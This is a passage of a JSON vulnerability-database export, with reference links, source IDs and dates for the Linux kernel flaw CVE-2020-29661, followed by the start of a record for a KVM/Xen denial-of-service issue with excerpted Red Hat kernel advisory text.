        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0444"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-25211"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25211"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28374"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29660"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/416.html"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/667.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0537"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/lcatro/cve_diff_checker"
      },
      {
        "trust": 0.1,
        "url": "https://alas.aws.amazon.com/al2/alaslivepatch-2021-032.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20230"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12723"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15436"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0719"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-35513"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20230"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12723"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15436"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10543"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-35513"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0689"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25645"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20265"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0857"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25656"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25656"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28374"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20265"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-0427"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19532"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7053"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-7053"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25645"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19532"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20907"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8624"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16300"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14466"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-10105"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25684"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13050"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15166"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9802"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26160"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16230"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9895"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8625"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-6829"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12403"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20388"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15165"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14382"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3156"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8812"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3899"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-16845"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14467"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8819"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10103"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14469"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11068"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3867"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1971"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16229"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8720"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9893"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19221"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8808"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3902"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14465"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14882"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8623"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16227"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25683"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18197"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1751"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3900"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14461"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14881"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9805"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14464"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8820"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9807"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8769"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8710"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8813"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9850"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14463"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-7595"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8811"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16228"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14879"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29652"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16168"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9803"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9862"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24659"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14469"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9327"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10105"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14880"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3885"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17450"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15503"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-16935"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12321"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20916"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14461"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-5018"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19956"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10018"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14422"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14468"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8835"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8764"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14466"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8844"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3865"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14882"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1730"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15586"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3864"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16227"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14464"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16452"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-19906"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16230"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20387"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14391"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15999"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14468"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14467"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14559"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14462"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3862"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14880"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25682"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14881"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3901"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16300"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8823"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14462"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-1752"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16229"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12400"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8622"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-15903"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3895"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8492"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-11793"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20454"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20843"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9894"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25685"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8816"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9843"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-13627"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-6405"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8771"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16451"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13050"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3897"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-10103"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9806"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0799"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14463"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8814"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14889"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8743"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9915"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25686"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8815"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13632"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25687"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10029"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16451"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8783"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-20807"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13630"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-14040"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14879"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14470"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25681"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14470"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8619"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-9283"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-27813"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-14465"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-11068"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13631"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8766"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16452"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8846"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3868"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-3894"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8782"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:0763"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:1031"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5130-1"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/linux"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3347"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27815"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20177"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29568"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27825"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27830"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36158"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29569"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-29661"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014190"
      },
      {
        "db": "PACKETSTORM",
        "id": "161656"
      },
      {
        "db": "PACKETSTORM",
        "id": "161607"
      },
      {
        "db": "PACKETSTORM",
        "id": "161835"
      },
      {
        "db": "PACKETSTORM",
        "id": "161742"
      },
      {
        "db": "PACKETSTORM",
        "id": "161710"
      },
      {
        "db": "PACKETSTORM",
        "id": "162028"
      },
      {
        "db": "PACKETSTORM",
        "id": "164812"
      },
      {
        "db": "PACKETSTORM",
        "id": "169012"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-778"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-29661"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2020-29661"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014190"
      },
      {
        "db": "PACKETSTORM",
        "id": "161656"
      },
      {
        "db": "PACKETSTORM",
        "id": "161607"
      },
      {
        "db": "PACKETSTORM",
        "id": "161835"
      },
      {
        "db": "PACKETSTORM",
        "id": "161742"
      },
      {
        "db": "PACKETSTORM",
        "id": "161710"
      },
      {
        "db": "PACKETSTORM",
        "id": "162028"
      },
      {
        "db": "PACKETSTORM",
        "id": "164812"
      },
      {
        "db": "PACKETSTORM",
        "id": "169012"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-778"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-29661"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-12-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-29661"
      },
      {
        "date": "2021-08-05T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014190"
      },
      {
        "date": "2021-03-04T15:33:19",
        "db": "PACKETSTORM",
        "id": "161656"
      },
      {
        "date": "2021-03-02T16:24:58",
        "db": "PACKETSTORM",
        "id": "161607"
      },
      {
        "date": "2021-03-17T14:22:58",
        "db": "PACKETSTORM",
        "id": "161835"
      },
      {
        "date": "2021-03-10T16:02:43",
        "db": "PACKETSTORM",
        "id": "161742"
      },
      {
        "date": "2021-03-09T15:57:57",
        "db": "PACKETSTORM",
        "id": "161710"
      },
      {
        "date": "2021-03-30T14:30:08",
        "db": "PACKETSTORM",
        "id": "162028"
      },
      {
        "date": "2021-11-09T16:59:39",
        "db": "PACKETSTORM",
        "id": "164812"
      },
      {
        "date": "2021-02-28T20:12:00",
        "db": "PACKETSTORM",
        "id": "169012"
      },
      {
        "date": "2020-12-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-778"
      },
      {
        "date": "2020-12-09T17:15:31.807000",
        "db": "NVD",
        "id": "CVE-2020-29661"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-29661"
      },
      {
        "date": "2024-03-22T07:18:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014190"
      },
      {
        "date": "2023-01-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-778"
      },
      {
        "date": "2023-11-07T03:21:33.210000",
        "db": "NVD",
        "id": "CVE-2020-29661"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "164812"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-778"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 resource locking vulnerability in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014190"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-778"
      }
    ],
    "trust": 0.6
  }
}

var-201511-0101
Vulnerability from variot

The KVM subsystem in the Linux kernel through 4.2.6, and Xen 4.3.x through 4.6.x, allows guest OS users to cause a denial of service (host OS panic or hang) by triggering many #DB (aka Debug) exceptions, related to svm.c. Linux Kernel is prone to a denial-of-service vulnerability. An attacker with a guest account can exploit this issue to cause an infinite loop in the host, denying service to legitimate users.

  • A flaw was found in the way the Linux kernel's file system implementation handled rename operations in which the source was inside and the destination was outside of a bind mount. (CVE-2015-7613, Important)

  • It was found that the Linux kernel's keys subsystem did not correctly garbage collect uninstantiated keyrings. for reporting the CVE-2015-5307 issue.

This update also fixes the following bugs:

  • Previously, Human Interface Device (HID) ran a report on an unaligned buffer, which could cause a page fault interrupt and an oops when the end of the report was read. This update fixes this bug by padding the end of the report with extra bytes, so the reading of the report never crosses a page boundary. As a result, a page fault and subsequent oops no longer occur. (BZ#1268203)

  • The NFS client was previously failing to detect a directory loop for some NFS server directory structures. This failure could cause NFS inodes to remain referenced after attempting to unmount the file system, leading to a kernel crash. Loop checks have been added to VFS, which effectively prevents this problem from occurring. (BZ#1272858)

  • Due to a race whereby the nfs_wb_pages_cancel() and nfs_commit_release_pages() calls both removed a request from the nfs_inode struct type, the kernel panicked with negative nfs_inode.npages count. The provided upstream patch performs the required serialization by holding the inode i_lock over the check of PagePrivate and locking the request, thus preventing the race and kernel panic from occurring. (BZ#1273721)

  • Due to incorrect URB_ISO_ASAP semantics, playing an audio file using a USB sound card could previously fail for some hardware configurations. This update fixes the bug, and playing audio from a USB sound card now works as expected. (BZ#1273916)

  • Inside hugetlb, region data structures were protected by a combination of a memory map semaphore and a single hugetlb instance mutex. However, a page-fault scalability improvement backported to the kernel on previous releases removed the single hugetlb instance mutex and introduced a new mutex table, making the locking combination insufficient, leading to possible race windows that could cause corruption and undefined behavior. This update fixes the problem by introducing a required spinlock to the region tracking functions for proper serialization. The problem only affects software using huge pages through hugetlb interface. 6.2) - x86_64

  • -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2016:0103-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0103.html Issue date: 2016-02-02 CVE Names: CVE-2015-8104 CVE-2016-0728 CVE-2016-0774 =====================================================================

  1. Summary:

Updated kernel packages that fix three security issues, multiple bugs, and one enhancement are now available for Red Hat Enterprise Linux 7.1 Extended Update Support.

Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux ComputeNode EUS (v. 7.1) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.1) - x86_64 Red Hat Enterprise Linux Server EUS (v. 7.1) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 7.1) - ppc64, ppc64le, s390x, x86_64

  1. It was found that the x86 ISA (Instruction Set Architecture) is prone to a denial of service attack inside a virtualized environment in the form of an infinite loop in the microcode due to the way (sequential) delivering of benign exceptions such as #DB (debug exception) is handled. A privileged user inside a guest could use this flaw to create denial of service conditions on the host kernel. (CVE-2015-8104, Important)

  2. A use-after-free flaw was found in the way the Linux kernel's key management subsystem handled keyring object reference counting in certain error path of the join_session_keyring() function. A local, unprivileged user could use this flaw to escalate their privileges on the system. (CVE-2016-0728, Important)

  3. It was found that the fix for CVE-2015-1805 incorrectly kept buffer offset and buffer length in sync on a failed atomic read, potentially resulting in a pipe buffer state corruption. A local, unprivileged user could use this flaw to crash the system or leak kernel memory to user space. (CVE-2016-0774, Moderate)

